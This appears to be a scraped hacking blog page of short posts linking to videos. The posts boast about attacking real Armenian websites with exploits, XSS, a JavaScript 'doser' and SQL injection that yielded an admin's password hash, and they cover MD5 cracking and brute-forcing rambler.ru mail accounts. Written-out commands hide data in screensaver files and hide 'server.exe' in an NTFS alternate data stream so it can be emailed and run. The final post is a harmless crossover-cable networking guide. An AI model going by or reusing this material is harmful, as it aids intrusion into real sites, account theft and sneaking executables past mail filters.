(I TAKE NO CREDIT FOR THIS TUTORIAL JUST POSTING!)

Read more >>

This Video about how i infect one armenian **** site with buffer overflow exploit and with javascript doser..
NOTE:This site hacked by my friend but i infect it for **** this site forever:))
If You Known How i infect this site see video:
Click Here For Download Video....

Read more >>

In This Video i find XSS in armenian site and i manupulate with this..
XSS very dangerous aspect in security..
For download Click in here:
Download_Now_

Read more >>

It`s 4 fun:)) How to inject *.chm file with dos code and how to exploit this.Really for enjoy:)
Download video
http://rapidshare.com/files/101605701/inject_with_dos_code.rar.html

Read more >>

Hmm......In this video i illutrate how to i verify one armenian site to sql injection vulnerable and then i exploited this site.In result i have hash and e-mail account of admin..
You can download this video from:
http://rapidshare.com/files/100361473/kkobi4.rar.html

Read more >>

How to crack MD5 algorithmic hash?It`s simple.In this video i illustrate this with
MDcrack-sse.exe(it`s command line tool)
Video and program included in archive..
http://rapidshare.com/files/108863477/hash_cracking_md5Collision.rar.html
[img]http://i024.radikal.ru/0804/4c/06ff5c1abe5c.jpg[/img]
[img]http://i006.radikal.ru/0804/3a/cde54205b563.jpg[/img]

Read more >>

Manual Unpacking of aspack 2.12 packer
http://rapidshare.com/files/102329720/Aspack_2.12_Al.y.rar.html

Read more >>

Manual_Unpacking_of _MEW 11 1.2 -> NorthFox/HCC packer
http://rapidshare.com/files/100845900/handle_mew.rar.html

Read more >>

In this video i illustrate how to remotely bruteforce e-mail accaunt on rambler.ru
http://rapidshare.com/files/98326940/bruteforce.rar.html

Read more >>

In This Video I illustrate how to hunt keylogger wich configured delivery logs with ftp..
For download video=>http://ifolder.ru/5540890
pass for download hexed

Read more >>

Firslty Thanks to invite me!And i want to say i dont know english very well.oopss:
In This My Post i write about Stenography Method For Hide Your Data..
For example if you want to hide your data(*.txt data) in *.scr file without lossing quality of *.scr or in another type of file(it`s analogic):
I write this batch script:
@REM CODED BY aka.step
cls
echo off
chdir %homedrive%\stenografik
cd %homedrive%\stenografik\image\
type %homedrive%\stenografik\image\1.scr>>10.txt
cd %homedrive%\stenografik\image
copy /B %homedrive%\stenografik\image\10.txt + %homedrive%\stenografik\src\1.scr %homedrive%\stenografik\src\2.txt
cd ../
copy /B %homedrive%\stenografik\src\2.txt + %homedrive%\stenografik\image\1.scr %homedrive%\stenografik\lib\step_by.scr
del /Q %homedrive%\stenografik\src\2.txt
del /Q %homedrive%\stenografik\image\10.txt
cls
start %homedrive%\stenografik\lib
exit
============Thats All.. Your *.Txt Hided In you Screensaver or in another file type:))
If you want to open stenography file and to see your confidenciale data, open your file with notepad which placed in
%homedrive%\stenografik\lib\step_by.scr <<==In This File You Have confidenciale data..(step_by.scr)
It`s very simple method but it`s very powerfull too..
With This method you can hide *.txt in(*.mp3,*.avi,*.jpg,*.gif and etc....)
Aka.Step

Read more >>

-Taken from my post at http://forums.educationd.info (I am the original author, go check)...

Okay, so why would we want to hide files using alternative data streams? Well, for example, you could hide a .exe file in a text file and send it through gmail or whatever.

So, first things first, we create a new text file. Inside the text file we type "blah blah blah", type whatever you want, it really doesn't matter. Save the text file as "test.txt" (or whatever you want).

Next, copy the .exe (or whatever file you wish to hide) to the same directory in which you saved "text.txt". In this case, my file will be "server.exe".

Now open up you command prompt, and navigate to the directory in which you saved the "test.txt" and enter the following command...

Code:

type server.exe > test.txt:server.exe

"server.exe" should have been successfully hidden in an alternative data stream within "test.txt". (if you open up "test.txt", you'll see that it looks exactly the same, even the file size )

You can now delete the original "server.exe".

To run the hidden "server.exe", open up the command prompt and enter the following...

Code:

start ./test.txt:server.exe

Aaand, thats it!

-Phate

Read more >>

I know alot of you might read this and say that im just opying and pasting, its true but i am the author so i can post it where i want... I know this is not got to do with hacking or cracking but most of my articles will be educational hope it helps ;)

Okay so why write about it? Well because there was once a time that i needed to know how to connect two computers together and I couldn't find any articles to help me and no links on the internet that had it in detail, so this is for the people that might experience the same.
So let's begin!

Firstly you will need to know how exactly your two PC's are going to connect. So here it is. The computers will connect directly to each other therefore no hub will be needed. For those of you that don't know, a hub is just a device that connects computers in a network via UTP STRAIGHT THROUGH cables.

The reason why I wrote straight through in caps is because this is not what you will be using to connect the two computers. Instead you will be using cross over cables. You can get this from a local computer store for relatively cheap. Or if you feel like doing work then make it, its really easy. If you need any help, then a Google search on how to make crossover cables will help alot. The reason why I don't tell you how, because I'm telling you how to connect two computers not create crossovers.

Anyways that's all the requirements you'll need, just a cross over cable. (Please note; if you buying or making a cross over, make sure it's at least cat5e UTP cables.)
Now that we got that out of the way, let's get to work!

Step1
On each computer, right click on "My Computer". Click Properties and then click on the "Computer Name" tab. Where it says "Computer description:" Give each computer a description (It must not be the same). Now click on the "change" so that you can change the name of the computer and create a workgroup. In the name option give it the same name you gave it for its description and in the workgroup section type in "my first network" (REMEMBER: Names of the computers should NOT be the same, BUT Workgroup names should be EXACT the same on both) Now once you change these, you will be asked to restart the computer, so simply click yes or ok, whatever you are prompted with.

Step 2
After the computers are rebooted you will need to setup IP addresses for each computer. This is how:
On your desktop, look for the icon named "My Network Places". Now dpouble click it to open it.
Once open look on the left to see an option "view network connections" and click on it.
Now right click on local area network and click properties.
Where it says "This connection uses the following items:"; scroll down to "Iternet Protocol (TCP/IP)", click on it and click the properties button.
Now click on "Use the following IP address" and at "IP Address" type in an IP address e.g 192.168.0.1.
Although you do the same steps for both computers you must have different IP addresses so you can make the second computers IP address 192.168.0.2
After you set the IP addresses just press the tab button and you should get a number in the subnet mask as 255.255.255.0, then press ok and wait a while and now you almost done!

Step 3
This is the easiest part; just take you cross over cable and connect to each computers network card RJ45 port. That's it you now will be able to see the computers in "My Network Places". You may start sharing files!

Read more >>